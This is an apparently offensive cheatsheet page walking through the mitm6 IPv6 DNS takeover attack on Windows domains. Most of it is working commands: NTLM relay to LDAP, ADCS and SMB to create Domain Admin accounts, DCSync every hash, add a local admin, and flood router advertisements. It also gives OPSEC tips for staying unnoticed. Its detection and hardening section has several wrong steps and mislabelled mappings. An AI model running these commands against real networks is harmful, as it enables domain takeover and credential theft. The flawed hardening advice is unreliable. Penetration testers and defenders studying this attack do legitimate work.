daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-9-mitm6-ipv6-dns-spoofing-dhcpv6-takeover.md (28171B)


      1 ---
      2 title: "Attack #9 β€” mitm6 (IPv6 DNS Spoofing DHCPv6 Takeover)"
      3 description: "mitm6 exploits a fundamental default behaviour of Windows: even in networks that have never deployed IPv6, every Windows machine continuously sends DHCPv6…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "credential-access", "ntlm", "relay"]
      7 tools: ["Nmap", "NetExec", "Impacket", "Rubeus", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #9 β€” mitm6 (IPv6 DNS Spoofing  DHCPv6 Takeover).md"
     11 ---
     12 # πŸ”΄ Attack #9 β€” mitm6 (IPv6 DNS Spoofing / DHCPv6 Takeover)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 mitm6 exploits a **fundamental default behaviour of Windows**: even in networks that have never deployed IPv6, every Windows machine continuously sends DHCPv6 Solicit messages at boot, on network reconnect, and periodically during operation, asking if there is an IPv6 DHCP server available. Since most enterprise networks have no legitimate DHCPv6 server, these broadcasts go unanswered β€” and that silence is the attack surface.
     19 
     20 The attacker runs mitm6, which responds to every DHCPv6 Solicit with a rogue DHCPv6 Reply, assigning the victim a link-local IPv6 address and β€” most critically β€” **designating the attacker's machine as the victim's primary DNS server**. Because Windows prefers IPv6 over IPv4 for DNS resolution, all subsequent DNS queries flow to the attacker. mitm6 then responds to specific queries (particularly WPAD) with its own IP, forcing the victim to initiate NTLM authentication to the attacker. ntlmrelayx relays that authentication to LDAP on the DC, and in the best case β€” an admin logging in β€” it automatically **creates a new Domain Admin account or adds DCSync rights** within seconds.
     21 
     22 A study of default-configuration Windows systems found that **95% are vulnerable** to credential harvesting via this IPv6 DNS manipulation.
     23 
     24 > ⚠️ **Windows 11 / Server 2025:** DHCPv6 remains enabled by default on all recent Windows versions. The mitigation is not automatic β€” administrators must explicitly disable it via GPO. IPv6 is **deeply embedded** in modern Windows kernels and disabling it is more difficult than in earlier versions.
     25 
     26 ### Why mitm6 Beats LLMNR Poisoning in Hardened Environments
     27 
     28 | Property | LLMNR/NBT-NS Poisoning | mitm6 |
     29 |---|---|---|
     30 | **Protocol abused** | LLMNR (UDP 5355) / NBT-NS (UDP 137) | DHCPv6 (UDP 546/547) + DNS (UDP 53) |
     31 | **Blocked by GPO?** | βœ… Easy to disable | ❌ Rarely disabled β€” DHCPv6 seen as benign |
     32 | **Requires DNS failure** | βœ… Only fires on failed DNS lookups | ❌ Works even with perfect DNS |
     33 | **Scope** | Only catches failed name resolutions | Intercepts ALL DNS queries from victims |
     34 | **Trigger** | Passive β€” user must make typo/broken path | Active β€” fires on every boot / network reconnect |
     35 | **Works if IPv6 disabled** | N/A | ❌ Fails if IPv6 completely disabled |
     36 
     37 ### The Full Attack Flow
     38 
     39 ```
     40 1. Attacker runs mitm6 on the internal network
     41 2. Windows machines send periodic DHCPv6 Solicit broadcasts (boot/reconnect)
     42 3. mitm6 responds with rogue DHCPv6 Reply:
     43    - Assigns victim a link-local IPv6 address
     44    - Sets ATTACKER as victim's primary IPv6 DNS server
     45 4. Victim's Windows now sends ALL DNS queries to attacker
     46 5. mitm6 answers WPAD queries with attacker's IP β†’ victim fetches fake PAC file
     47 6. WPAD PAC fetch triggers NTLM authentication to attacker (NTLMv2 hash sent)
     48 7. ntlmrelayx relays NTLM auth to LDAP/LDAPS on the DC
     49 8. ntlmrelayx escalates:
     50    - Creates new user in Domain Admins / Enterprise Admins group (if DA relayed)
     51    - Adds DCSync rights to attacker-controlled account (if high-priv user relayed)
     52    - Adds attacker-controlled machine account (if regular user relayed)
     53 9. Full domain compromise achieved β€” no initial credentials required
     54 ```
     55 
     56 ***
     57 
     58 ## βš™οΈ Prerequisites
     59 
     60 | Requirement | Detail |
     61 |---|---|
     62 | **Internal network access** | Must be on same subnet as victims β€” broadcast domain required for DHCPv6 |
     63 | **IPv6 not fully disabled** | If IPv6 is completely disabled on all hosts, attack fails β€” but this is rare |
     64 | **DHCPv6 not blocked by firewall** | If UDP 546/547 inbound is blocked by Windows Firewall GPO, mitm6 can't respond |
     65 | **NTLM not disabled** | Relay chain requires NTLM (though Kerberos relay variants exist β€” see CVE-2026-20929) |
     66 | **LDAP signing/channel binding not enforced** | For LDAP relay to DC; if enforced, relay to LDAPS or SMB instead |
     67 | **Wait for trigger event** | Must wait for victim machine to reboot, reconnect, or periodically refresh DHCPv6 |
     68 
     69 ***
     70 
     71 ## πŸ› οΈ Tools
     72 
     73 | Tool | Platform | Role |
     74 |---|---|---|
     75 | **mitm6** | Linux | Core DHCPv6/DNS spoofer β€” the entire attack starts here |
     76 | **ntlmrelayx.py** (Impacket) | Linux | Relay engine β€” receives NTLM from mitm6 victims, relays to DC LDAP |
     77 | **Responder** | Linux | Optional β€” can run alongside mitm6 for additional hash capture |
     78 | **secretsdump.py** | Linux | Post-exploitation β€” DCSync after relayed escalation |
     79 | **Wireshark / tcpdump** | Linux | Monitor DHCPv6 traffic; verify victims are being assigned rogue DNS |
     80 | **BloodHound / SharpHound** | Both | Post-DA β€” enumerate domain using newly created account |
     81 
     82 ***
     83 
     84 ## πŸ’» Full Commands
     85 
     86 ### πŸ”΅ Step 0 β€” Verify IPv6 is Active on the Network
     87 
     88 ```bash
     89 # ── Passive capture β€” verify DHCPv6 Solicit broadcasts ───────────────────────
     90 sudo tcpdump -i eth0 udp port 546 or udp port 547 -v
     91 # You should see DHCPv6 Solicit messages from Windows machines
     92 # If you see nothing, IPv6 may be disabled on the subnet
     93 
     94 # ── Wireshark filter ──────────────────────────────────────────────────────────
     95 # Filter: dhcpv6 or icmpv6
     96 
     97 # ── Nmap β€” enumerate IPv6-enabled hosts ──────────────────────────────────────
     98 nmap -6 -sn fe80::/64
     99 nmap -6 --script=ipv6-multicast-mld-list -p 0 <target>
    100 
    101 # ── Check if WPAD is resolvable (pre-attack reconnaissance) ──────────────────
    102 nslookup wpad
    103 # If "Non-existent domain" β†’ mitm6 will intercept the WPAD query
    104 ```
    105 
    106 ***
    107 
    108 ### πŸ”΄ mitm6 β€” Core Tool Setup
    109 
    110 ```bash
    111 # ── Install mitm6 ─────────────────────────────────────────────────────────────
    112 pip3 install mitm6
    113 # or
    114 git clone https://github.com/dirkjanm/mitm6
    115 cd mitm6 && pip3 install .
    116 
    117 # ── Basic run β€” target a specific domain ─────────────────────────────────────
    118 sudo mitm6 -d corp.local
    119 
    120 # ── Recommended run β€” target domain, suppress router advertisements ───────────
    121 sudo mitm6 -d corp.local --no-ra
    122 # --no-ra = don't send Router Advertisements (reduces noise, more targeted)
    123 
    124 # ── Specify network interface explicitly ─────────────────────────────────────
    125 sudo mitm6 -i eth0 -d corp.local --no-ra
    126 
    127 # ── Target a specific subnet only ─────────────────────────────────────────────
    128 sudo mitm6 -d corp.local -i eth0 --ignore-nofqdn --no-ra
    129 
    130 # ── Verbose output (see each DHCPv6 response sent) ───────────────────────────
    131 sudo mitm6 -d corp.local --no-ra -v
    132 
    133 # ── What you'll see in output:
    134 # [*] Sent spoofed reply to fe80::xxxx for WPAD.corp.local
    135 # [*] Sent spoofed reply to fe80::xxxx for corp.local
    136 # This means victims are now routing DNS through you
    137 ```
    138 
    139 ***
    140 
    141 ### πŸ”΄ ntlmrelayx Setup β€” LDAP Relay for DA Account Creation
    142 
    143 ```bash
    144 # ── STEP 1: Prepare relay to LDAP (primary escalation method) ─────────────────
    145 
    146 # Relay to LDAP β€” auto-create new user in Domain Admins (if DA logs in)
    147 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \
    148   -smb2support -l loot/
    149 
    150 # ── Flags explained:
    151 # -6           = enable IPv6 support (critical for mitm6 relay)
    152 # -t ldap://   = relay target (DC LDAP)
    153 # -wh          = WPAD hostname to respond to (attacker-wpad = your machine's name)
    154 # -smb2support = support SMBv2 on the relay listener
    155 # -l loot/     = dump LDAP info to this directory
    156 
    157 # ── Relay to LDAPS (if LDAP signing enforced) ─────────────────────────────────
    158 ntlmrelayx.py -6 -t ldaps://DC01.corp.local -wh attacker-wpad \
    159   -smb2support -l loot/
    160 
    161 # ── STEP 2: Run mitm6 in a separate terminal ──────────────────────────────────
    162 sudo mitm6 -d corp.local --no-ra
    163 
    164 # ── STEP 3: Wait for a privileged user to log in or machine to reboot ─────────
    165 # ntlmrelayx output when DA is relayed:
    166 # [*] HTTPD(80): Connection from 10.10.10.50 controlled, attacking target ldap://DC01.corp.local
    167 # [*] Authenticating against ldap://DC01.corp.local as CORP\Administrator
    168 # [*] Adding new user with username: QMFbhMXG and password: XYZ to domain
    169 # [*] Privilege Escalation Done! QMFbhMXG is in the Administrators group!
    170 
    171 echo "Domain Admin account created β€” game over"
    172 ```
    173 
    174 ***
    175 
    176 ### πŸ”΄ Full Attack Chain β€” mitm6 β†’ LDAP Relay β†’ DCSync
    177 
    178 ```bash
    179 # ── Terminal 1: Start mitm6 ───────────────────────────────────────────────────
    180 sudo mitm6 -d corp.local --no-ra -i eth0
    181 
    182 # ── Terminal 2: Start ntlmrelayx with LDAP target + loot dump ────────────────
    183 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \
    184   -smb2support -l loot/ --no-da --no-acl
    185 
    186 # Wait for a domain user to authenticate...
    187 
    188 # ── Terminal 3 (after successful relay): Check loot directory ────────────────
    189 ls loot/
    190 # Contains: domain_computers.html, domain_users.html, domain_groups.html etc.
    191 cat loot/domain_users.html
    192 
    193 # ── If a Domain Admin was relayed β€” new account auto-created ─────────────────
    194 # ntlmrelayx creates: random username + random password
    195 # Check ntlmrelayx output for the credentials
    196 
    197 # ── DCSync using the newly created DA account ─────────────────────────────────
    198 secretsdump.py corp.local/QMFbhMXG:'CreatedPassword'@DC01.corp.local
    199 
    200 # ── OR add DCSync rights to your own pre-created account ─────────────────────
    201 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \
    202   -smb2support --escalate-user low_user
    203 
    204 # After escalation:
    205 secretsdump.py corp.local/low_user:'KnownPassword'@DC01.corp.local -just-dc-ntlm
    206 ```
    207 
    208 ***
    209 
    210 ### πŸ”΄ mitm6 β†’ ADCS Relay (Most Destructive Chain)
    211 
    212 ```bash
    213 # ── If LDAP signing/channel binding blocks LDAP relay, target ADCS instead ───
    214 
    215 # Terminal 1: mitm6
    216 sudo mitm6 -d corp.local --no-ra
    217 
    218 # Terminal 2: ntlmrelayx to ADCS HTTP enrollment endpoint
    219 ntlmrelayx.py -6 -t http://ADCS01.corp.local/certsrv/certfnsh.asp \
    220   -wh attacker-wpad -smb2support --adcs --template "DomainController"
    221 
    222 # When DC machine account authenticates (via coercion or reboot):
    223 # ntlmrelayx requests a DomainController template certificate for DC01$
    224 # Output: [*] Got certificate! Saved as DC01$.pfx
    225 
    226 # Request TGT using the DC machine certificate (PKINIT)
    227 .\Rubeus.exe asktgt /user:DC01$ /certificate:DC01$.pfx /password:'' /ptt /nowrap
    228 
    229 # DCSync using DC machine account TGT
    230 secretsdump.py -k -no-pass corp.local/'DC01$'@DC01.corp.local -just-dc-ntlm
    231 
    232 # Result: Full domain hash dump β€” total compromise
    233 ```
    234 
    235 ***
    236 
    237 ### πŸ”΄ mitm6 β†’ SMB Relay (Alternative When LDAP Is Locked Down)
    238 
    239 ```bash
    240 # Terminal 1: mitm6
    241 sudo mitm6 -d corp.local --no-ra
    242 
    243 # Terminal 2: ntlmrelayx to SMB targets (SMB signing must be disabled on target)
    244 nxc smb 10.10.10.0/24 --gen-relay-list smb_targets.txt
    245 ntlmrelayx.py -6 -tf smb_targets.txt -wh attacker-wpad \
    246   -smb2support -i
    247 
    248 # When relay succeeds to SMB target:
    249 nc 127.0.0.1 11000   # Interactive SMB shell as relayed user
    250 
    251 # Execute commands on relayed target
    252 ntlmrelayx.py -6 -tf smb_targets.txt -wh attacker-wpad \
    253   -smb2support -c "net user hacker P@ssword123! /add && net localgroup administrators hacker /add"
    254 ```
    255 
    256 ***
    257 
    258 ### πŸ”΄ Advanced: krbrelayx Integration β€” Kerberos Relay via mitm6
    259 
    260 ```bash
    261 # ── CVE-2026-20929: Relay Kerberos tickets instead of NTLM ─────────────────
    262 # This bypasses some defences designed for NTLM-only relay
    263 
    264 # Terminal 1: mitm6
    265 sudo mitm6 -d corp.local --no-ra
    266 
    267 # Terminal 2: krbrelayx β€” accepts Kerberos from mitm6 victims
    268 python3 krbrelayx.py -ts DC01.corp.local
    269 
    270 # Terminal 3: On DC, check for new account creation (same as LDAP relay)
    271 # krbrelayx will auto-escalate if a machine account with sufficient privileges relays
    272 
    273 # This is more stealthy than NTLM relay in modern defences
    274 ```
    275 
    276 ***
    277 
    278 ### πŸ”΄ RA Flooding β€” Alternative When DHCPv6 Relay Fails
    279 
    280 ```bash
    281 # ── If DHCPv6 isn't triggering, use Router Advertisement flooding ────────────
    282 
    283 # Terminal 1: RA flood (forces IPv6 priority without DHCP)
    284 sudo python3 -m pip install scapy
    285 python3 - <<'EOF'
    286 from scapy.all import *
    287 from scapy.layers.inet6 import *
    288 
    289 iface = "eth0"
    290 target_prefix = "2001:db8::/64"  # Your target IPv6 prefix
    291 
    292 def flood_ra():
    293     pkt = Ether()/IPv6(src="fe80::1", dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix=target_prefix)
    294     while True:
    295         sendp(pkt, iface=iface, interval=1, verbose=0)
    296 
    297 flood_ra()
    298 EOF
    299 
    300 # This forces all victims to prefer IPv6 β€” DNS then flows to your mitm6
    301 ```
    302 
    303 ***
    304 
    305 ### πŸ”΄ Delegate Access β€” Targeted Domain Escalation via Relay
    306 
    307 ```bash
    308 # ── Instead of creating new user, grant specific rights to existing user ─────
    309 
    310 # ntlmrelayx with --escalate-user (adds DCSync rights)
    311 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \
    312   -smb2support --escalate-user "corp\low_priv_user"
    313 
    314 # ntlmrelayx with --add-computer (add computer account)
    315 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \
    316   -smb2support --add-computer attacker-owned
    317 
    318 # ntlmrelayx with --no-acl (just dump LDAP, don't modify)
    319 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \
    320   -smb2support --no-acl
    321 
    322 # Specific escalation after relay β€” read the LDAP dump first, then decide
    323 secretsdump.py -hashes :HASH corp.local/elevated_user@DC01.corp.local -just-dc-ntlm
    324 ```
    325 
    326 ***
    327 
    328 ### πŸ”΄ Monitoring β€” Verify mitm6 is Working
    329 
    330 ```bash
    331 # ── Check which victims have been assigned rogue DNS ─────────────────────────
    332 sudo tcpdump -i eth0 udp port 547 -v | grep -i "solicit\|advertise\|reply"
    333 
    334 # ── Watch for WPAD requests hitting your machine ──────────────────────────────
    335 sudo tcpdump -i eth0 port 80 -v | grep -i "wpad"
    336 
    337 # ── Monitor ntlmrelayx for successful relays ──────────────────────────────────
    338 # Watch for lines containing:
    339 # "HTTPD: Received connection from..."
    340 # "Authenticating against ldap://..."
    341 # "Adding new user..."
    342 # "Privilege Escalation Done!"
    343 ```
    344 
    345 ***
    346 
    347 ## 🧩 Troubleshooting
    348 
    349 | Error | Cause | Fix |
    350 |---|---|---|
    351 | **mitm6 not receiving DHCPv6 Solicit messages** | IPv6 disabled on victim network or firewall blocking UDP 546/547 | Run `sudo tcpdump udp port 546` to verify DHCPv6 traffic exists; if none, try different subnet or disable IPv6 filtering |
    352 | **ntlmrelayx LDAP relay fails with "signing error"** | LDAP signing or channel binding enforced on DC | Switch to LDAPS (`-t ldaps://`), ADCS HTTP relay, or SMB relay instead |
    353 | **No WPAD requests seen in ntlmrelayx output** | WPAD proxy already configured on victims via GPO, or DNS not redirecting | Verify mitm6 is responding to WPAD queries with `tcpdump port 80`; check if victims have hardcoded WPAD server in registry |
    354 | **IPv6 completely disabled on subnet** | GPO or Registry DisabledComponents flag set to 0xFF | Impossible to exploit with mitm6; use LLMNR/NBT-NS poisoning instead |
    355 | **Relay target unreachable after NTLM capture** | Firewall rule blocks attacker→DC on port 389/636 (LDAP/LDAPS) | Confirm network path with `nc -zv DC01.corp.local 389`; consider SMB relay (port 445) as alternative |
    356 | **ntlmrelayx creates user but no DCSync rights** | Relay not from Domain Admin or Enterprise Admin | Use `--escalate-user` flag instead; or wait for DA to authenticate |
    357 | **mitm6 causes network-wide DNS failures** | Router Advertisement (RA) messages disrupting routing | Always use `--no-ra` flag; scope to exact domain with `-d corp.local` |
    358 | **Relay account created but can't use it for DCSync** | Account locked, password expired, or UPN format wrong | Verify format: `secretsdump.py corp.local/USERNAME:'PASSWORD'@DC01.corp.local`; check account status with `net user` |
    359 
    360 ***
    361 
    362 ## 🎯 OPSEC Tips
    363 
    364 - **Always use `--no-ra`** β€” Router Advertisement messages are noisy and can disrupt network routing for all victims, which causes immediate IT investigation
    365 - **Scope to your target domain** with `-d corp.local` β€” without this, mitm6 answers ALL DNS queries including internet traffic, causing visible disruption
    366 - **Run during high-activity windows** β€” morning logon storms (8–9am), after patching cycles, or when large numbers of machines reboot give you maximum relay opportunities
    367 - **Target LDAP over SMB** when possible β€” LDAP relay creates persistent domain objects (new admin users, DCSync rights) rather than temporary shell access
    368 - **Use `--no-da --no-acl` flags in ntlmrelayx initially** β€” dump LDAP info first to understand the domain before making noisy modifications
    369 - **mitm6 causes minor IPv6 disruption** β€” some machines may experience temporary DNS resolution issues; keep attack windows short (15–30 minutes)
    370 - **Combine with Responder on different protocols** β€” run mitm6 for DHCPv6/DNS and Responder in analyse mode simultaneously to map the full authentication landscape
    371 - **Time-to-execute estimate:** mitm6 setup (5 min) + waiting for trigger event (5–30 min depending on logon activity) = 10–35 minutes to domain compromise
    372 - **Tool versions:** Use latest Impacket for ntlmrelayx (GitHub main branch preferred over pip); mitm6 1.0+ recommended; test in lab first for version compatibility
    373 
    374 ***
    375 
    376 ## πŸ›‘οΈ Detection β€” Event IDs / Network Indicators
    377 
    378 | Source | What to Look For |
    379 |---|---|
    380 | **Windows Event 4741** | New computer account created β€” ntlmrelayx `--add-computer` via relayed auth |
    381 | **Windows Event 4728/4732** | User added to privileged group β€” DA account creation by ntlmrelayx |
    382 | **Windows Event 4662** | ACE modification on AD object β€” DCSync rights being granted to account |
    383 | **Windows Event 4624 Type 3** | Logon from unexpected source IP (attacker's machine) |
    384 | **Network β€” DHCPv6 UDP 546/547** | Rogue DHCPv6 server responding on the subnet (only one should exist) |
    385 | **Network β€” DNS** | Unusual DNS responses from non-DC IP addresses; WPAD queries answered by unexpected host |
    386 | **IDS/Zeek/Suricata** | DHCPv6 Advertise/Reply messages from a host not designated as a DHCP server |
    387 | **SIEM** | New privileged accounts created outside of standard provisioning workflows |
    388 
    389 **Primary detection signature:** A **DHCPv6 Reply or Advertisement packet from a host that is not the legitimate DHCP server** is an immediate indicator of mitm6 in operation. Network-level detection via Zeek scripts or Suricata rules monitoring DHCPv6 traffic is the most reliable defence. On the Windows side, a new Domain Admin account created without a corresponding ITSM ticket is a high-confidence alert.
    390 
    391 ### Sigma Rules for Detection
    392 
    393 **Rule: Rogue DHCPv6 Server Detection**
    394 ```yaml
    395 title: DHCPv6 Advertise from Non-DHCP Host
    396 detection:
    397   selection:
    398     NetworkProtocol: DHCPv6
    399     DHCPv6MessageType: Advertise
    400     SourceIP: '!10.10.10.10'  # Exclude legitimate DHCP server
    401   condition: selection
    402 ```
    403 
    404 **Rule: Suspicious LDAP Modifications via Relay**
    405 ```yaml
    406 title: Bulk LDAP Group Modification (Possible Relay)
    407 detection:
    408   selection:
    409     EventID: 5136
    410     ObjectClass: group
    411     AttributeLDAPDisplayName: member
    412     ValueAdded: '*'
    413   condition: selection | count(ObjectDN) > 5 and timespan(5m)
    414 ```
    415 
    416 ### EDR-Specific Detections
    417 
    418 - **Crowdstrike Falcon:** Monitor for IPv6 DNS server changes + NTLM relay auth in short time window
    419 - **Defender for Endpoint:** Alert on new user creation by system processes; flag DHCPv6 server role changes
    420 - **Sentinel One:** Watch for network discovery commands (ipconfig /all, Get-NetIPConfiguration) followed by WPAD lookups
    421 - **Carbon Black:** Correlate ntlmrelayx.py process creation with ldap:// network connections to DC
    422 
    423 ### Hardening Commands
    424 
    425 ```powershell
    426 # ── Disable DHCPv6 client via Group Policy ─────────────────────────────────
    427 Computer Configuration β†’ Administrative Templates β†’
    428   Network β†’ TCPIP Settings β†’ IPv6 Transition Technologies
    429     Set "6to4 State" = Disabled
    430     Set "ISATAP State" = Disabled
    431 
    432 # ── Registry-based mitigation (local machine) ────────────────────────────────
    433 reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters" /v DisabledComponents /t REG_DWORD /d 0xFF /f
    434 # 0xFF disables all IPv6 completely (aggressive but effective)
    435 # 0x01 disables IPv6 on all non-tunnel interfaces (balanced)
    436 
    437 # ── Windows Firewall β€” Block DHCPv6 inbound ───────────────────────────────────
    438 powershell -NoProfile -Command "Get-NetFirewallRule -DisplayName '*DHCPv6*' | Set-NetFirewallRule -Enabled False"
    439 
    440 # ── IPv6 priority adjustment (reduces DHCPv6 preference) ────────────────────
    441 reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters" /v IpUseDhcpNameServer /t REG_DWORD /d 0 /f
    442 
    443 # ── RA Guard (prevents rogue router advertisements) ───────────────────────────
    444 # On edge firewall/router:
    445 # Cisco: ipv6 nd raguard attach-policy {policy-name}
    446 # Juniper: forwarding-options family inet6 router-discovery {ra-guard}
    447 
    448 # ── Enforce LDAP signing + channel binding on DC ────────────────────────────
    449 dsregcmd /status  # Check current settings
    450 # Set via GPO: Computer Config β†’ Policies β†’ Windows Settings β†’ Security Settings β†’
    451 #   Local Policies β†’ Security Options:
    452 #   "Domain member: Require strong (Windows 2000 or later) session key"
    453 #   "LDAP client signing requirements" = Require Signing
    454 ```
    455 
    456 ***
    457 
    458 ## πŸ—ΊοΈ MITRE ATT&CK
    459 
    460 | Technique | ID | Description |
    461 |---|---|---|
    462 | **Adversary-in-the-Middle** | T1557 | mitm6 performs MITM on IPv6 DNS traffic |
    463 | **LLMNR/NBT-NS Poisoning** | T1557.001 | DHCPv6 hijacking is conceptually similar to LLMNR poisoning β€” intercepting legitimate protocol to redirect to attacker |
    464 | **Exploitation for Privilege Escalation** | T1548 | ntlmrelayx relay chain escalates from low user to Domain Admin |
    465 | **Account Manipulation** | T1098 | Creation of new Domain Admin account via relayed LDAP authentication |
    466 | **NTLM Relay** | (Implied T1557 + T1040) | Core technique: capture NTLM auth, relay to different service |
    467 
    468 ***
    469 
    470 ## πŸ”— Attack Chain Context
    471 
    472 ```
    473 [mitm6 DHCPv6 Poisoning] ──→ Rogue DNS Server for All Subnet Victims
    474          β”‚
    475          β”œβ”€β”€β†’ WPAD NTLM Auth β†’ ntlmrelayx LDAP β†’ New DA Account β†’ DCSync
    476          β”œβ”€β”€β†’ WPAD NTLM Auth β†’ ntlmrelayx LDAPS β†’ Shadow Credentials β†’ TGT
    477          β”œβ”€β”€β†’ WPAD NTLM Auth β†’ ntlmrelayx ADCS β†’ DC Cert β†’ TGT β†’ DCSync
    478          β”œβ”€β”€β†’ WPAD NTLM Auth β†’ ntlmrelayx SMB β†’ Shell + LSASS dump β†’ PtH
    479          β”œβ”€β”€β†’ DNS hijack β†’ redirect all traffic β†’ full MitM for credential harvest
    480          └──→ Wait for DA to log in β†’ instant Enterprise Admin creation β†’ game over
    481 ```
    482 
    483 **The scenario that ends engagements in minutes:** mitm6 is running. An administrator logs into any domain-joined workstation on the subnet β€” even just to check something. Their machine sends a DHCPv6 Solicit. mitm6 responds. WPAD queries flow to the attacker. NTLM authentication arrives at ntlmrelayx. ntlmrelayx relays to DC LDAP. A new account is created in Domain Admins. DCSync is run. Every domain password hash is exfiltrated. **Total time: under 3 minutes**.
    484 
    485 **Cross-references:**
    486 - Attack #10: Credential Hunting in Shares / GPP Passwords (alternative initial access without relay)
    487 - Attack #72: LAPS Deprecation & Takeover (modern mitigation mechanism, but requires proper deployment)
    488 
    489 ***
    490 
    491 > βœ… **Attack #9 β€” mitm6 complete.** Tell me to move on when you're ready for **Attack #10 β€” Credential Hunting in Shares / GPP Passwords**.
    492 
    493 Sources
    494  MITM6 + NTLM Relay: How IPv6 Auto-Configuration Leads to Full ... https://www.resecurity.com/blog/article/mitm6-ntlm-relay-how-ipv6-auto-configuration-leads-to-full-domain-compromise
    495  IPv6 Attacks - README - Preperation | OSCP https://oscp.adot8.com/active-directory/initial-attack-strategy/ipv6-attacks
    496  MITM6 IPv6 Attack | Pentesting Checklist - GitBook https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/initial-attack-vectors/mitm6-ipv6-attack
    497  [PDF] Exploiting Ipv6 DNS Behavior in Windows 11 Networks - IJFMR https://www.ijfmr.com/papers/2025/6/58968.pdf
    498  IPv6 - Man in the Middle | We explain attack and defense - ProSec https://www.prosec-networks.com/en/blog/ipv6-mitm/
    499  IPv6 DNS Takeover with MitM6: Strategies for Network Security https://www.evolvesecurity.com/blog-posts/tools-of-the-trade-ipv6-dns-takeover-with-mitm6
    500  IPv6 Attacks - Infosec Notes https://notes.frozensoliddesigns.com/exploitation/active-directory/ipv6-attacks
    501  Fragmentation Considered Poisonous https://arxiv.org/pdf/1205.4011.pdf
    502  Security of Patched DNS http://arxiv.org/pdf/1205.5190.pdf
    503  The Impact of DNS Insecurity on Time https://arxiv.org/pdf/2010.09338.pdf
    504  Hybrid Detection and Mitigation of DNS Protocol MITM attack based on Firefly algorithm with Elliptical Curve Cryptography https://publications.eai.eu/index.php/phat/article/download/3177/2319
    505  Injection Attacks Reloaded: Tunnelling Malicious Payloads over DNS https://arxiv.org/pdf/2205.05439.pdf
    506  Encrypted and Covert DNS Queries for Botnets: Challenges and
    507   Countermeasures http://arxiv.org/pdf/1909.07099.pdf
    508  HADES: Detecting Active Directory Attacks via Whole Network Provenance
    509   Analytics http://arxiv.org/pdf/2407.18858.pdf
    510  A Survey on Malicious Domains Detection through DNS Data Analysis https://arxiv.org/pdf/1805.08426.pdf
    511  IPv6 Attack with MITM6 & NTLMRELAYX - YouTube https://www.youtube.com/watch?v=AmcWc2CjXx8
    512  How to prevent IPv6 DNS Takeover with mitm6 - LinkedIn https://www.linkedin.com/posts/abdussatter51_ipv6-dns-take-over-on-active-directory-activity-7319677013928067072-PP3o
    513  Relaying Kerberos with MiTM6 - CVE-2026-20929 - YouTube https://www.youtube.com/watch?v=RGoSvD-P_FU
    514  Hacks Weekly #61 - Man in the middle with MITM6 and NTLMRelay https://www.youtube.com/watch?v=qb0l5cPz0nw
    515  Domain Admin via IPv6 DNS Takeover : r/HowToHack - Reddit https://www.reddit.com/r/HowToHack/comments/e8n67r/domain_admin_via_ipv6_dns_takeover/
    516  Six Minutes for MiTM6 - YouTube https://www.youtube.com/watch?v=qrFxDNotgO8
    517  Network Relaying and NTLM Relay Attacks in Windows Domains https://www.lrqa.com/en/cyber-labs/network-relaying-abuse-windows-domain/
    518  caster0x00/Intercept: MITM Field Manual - GitHub https://github.com/caster0x00/MITMonster